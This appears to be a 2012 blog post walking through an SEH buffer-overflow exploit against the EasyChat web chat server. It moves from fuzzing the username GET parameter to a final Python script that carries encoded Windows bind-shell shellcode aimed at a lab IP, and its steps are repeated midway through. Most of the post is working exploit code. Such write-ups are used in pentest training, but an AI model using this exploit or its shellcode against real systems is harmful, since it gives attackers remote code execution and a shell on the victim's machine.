Rabu, 22 Februari 2012

EXPLOIT EasyChat ( S E H )

I.    INFORMATION GATHERING
while waiting result of wireshark, open application





Result Of WireShark







II. Service Enumuration

Port 80

SSL Port 443

III. Vulnerability Identification

GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1"
(this information by Wireshark) we know that we can sending fuzzer with port 80 and Header GET /chat.ghp?username=heril&password=heril&room=1 HTTP/1.1"/.



IV. Exploitation

1.    making Fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 30000
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain


making pattern_create 30000


2.    Edit Fuzzer

import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="your pattern_create"
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain

then


3. search Module

choose view + executable module
and choose SSLEAY32
Click double
and follow my ways




4. Edit your Fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216
tes+="\xEE\xEE\xEE\xEE"
tes+="\xB6\xB2\x01\x10"
tes+="\x90" * (30004-len(tes))
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

Run again your fuzzer when the application crash choose view + seh chain + press F2
then press Shift F9 
pres F7 + F7 + F7


Lookat position POP POP RETN.

edit fuzzer

I.    INFORMATION GATHERING
while waiting result of wireshark, open application





Result Of WireShark







II. Service Enumuration

Port 80
SSL Port 443

III. Vulnerability Identification

GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1"
(this information by Wireshark) we know that we can sending fuzzer with port 80 and Header GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1"/.

IV. Exploitation

1.    making Fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain


making pattern_create 30000
2.    Edit Fuzzer

import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="your pattern_create"
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain

then


3. search Module

choose view + executable module
and choose SSLEAY32

Bad value in module 4,5,6,7,C,3 and F
we will try Search Bad value in SSLEAY32 Module of applocation

copy ssleay32.dll into /pentest/exploits/framework
then
root@justview:/pentest/exploits/framework# ./msfpescan -i ssleay32.dll 

we don't found bad value, so we will make this module.
Click double
and follow my ways





4. Create Shellcode & Edit your Fuzzer

Open your Browser
Choose Windows Bind shell






#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216
tes+="\xEB\x06\x90\x90"
tes+="\xB6\xB2\x01\x10"
tes+="\x90" * 16
tes+=("\x33\xc9\xb1\x51\xda\xcb\xb8\xa7\x84\x38\x6a\xd9\x74\x24\xf4\x5b"
"\x31\x43\x13\x03\x43\x13\x83\x4c\x78\xda\x9f\x6e\xeb\xf0\x2d\x66"
"\x15\xf9\x51\x89\x86\x8d\xc2\x51\x63\x19\x5f\xa5\xe0\x61\x65\xad"
"\xf7\x76\xee\x02\xe0\x03\xae\xbc\x11\xff\x18\x37\x25\x74\x9b\xa9"
"\x77\x4a\x05\x99\xfc\x8a\x42\xe6\x3d\xc0\xa6\xe9\x7f\x3e\x4c\xd2"
"\x2b\xe5\x85\x51\x31\x6e\x8a\xbd\xb8\x9a\x53\x36\xb6\x17\x17\x17"
"\xdb\xa6\xcc\xa4\xcf\x23\x9b\xc6\x2b\x28\xfd\xd5\x05\x8b\x99\x52"
"\x26\x1b\xe9\x24\xa5\xd0\x9d\xb8\x18\x6d\x1d\xc8\x3c\x1a\x10\x86"
"\xce\x36\x7c\xe9\x19\xa0\x2e\x73\xce\x1e\xe3\x13\x79\x12\x31\xbc"
"\xd1\x2b\xe5\x2a\x11\x3e\xfa\x91\xf5\x3e\xd5\xba\x7c\x25\xbc\xc5"
"\x92\xae\x43\x90\x06\xad\xbc\xca\xbf\x68\x4b\x1f\x92\xdc\xb3\x09"
"\xbe\xb1\x18\xe6\x12\x75\xcc\x4b\xc6\x86\x22\x2d\x80\x69\x9f\xd7"
"\x03\x03\xfe\x82\xcc\xb7\x1b\xdc\xcb\xef\xe4\xca\xbe\x1f\x4a\xa7"
"\xc1\xf0\x04\xe3\x93\xdf\x3d\xbc\x14\xc9\xed\x17\x14\x26\x79\x72"
"\xa3\x41\x33\x2b\xcb\x98\x94\x87\x67\x70\xea\xf7\x1b\x12\xf3\x8e"
"\xdd\x9a\xac\x8f\x34\x09\xac\xbf\xdf\xd8\x36\x59\x48\x7e\xda\x2c"
"\x6d\xea\x74\x77\x47\x27\xfd\x60\xfd\xf3\x77\x8c\x33\x3c\x74\xfa"
"\xca\xfe\x56\x04\x70\xd3\x3b\x75\x0f\x13\x97\x2e\x5b\x0b\x95\xce"
"\x2f\xda\xa6\x5b\x14\x1c\x8e\xf8\xc3\xb0\x7e\xaf\xba\x5e\x80\x1e"
"\x6c\xca\xd3\x5f\x5e\x9c\x7e\x46\x5a\x93\xd2\x87\xb3\x41\x2a\x88"
"\x0b\x69\x04\xfd\x23\x69\x26\xc5\xa8\x6e\xff\x97\xcf\x41\x68\x69"
"\xe8\x80\x1a\xc6\xf7\x93\x22\x38")
tes+="\x90" * (30004-len(tes))
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()






Run again fuzzer 


GOOD LUCK





































Diposting oleh di

1 komentar:

  1. veso2665 Juni 2016 pukul 07.24

    Hi where can I download Easy Chat Server 2 and 3?

    Thanks for Anwsering and Best Regards

    BalasHapus

Langganan: Posting Komentar (Atom)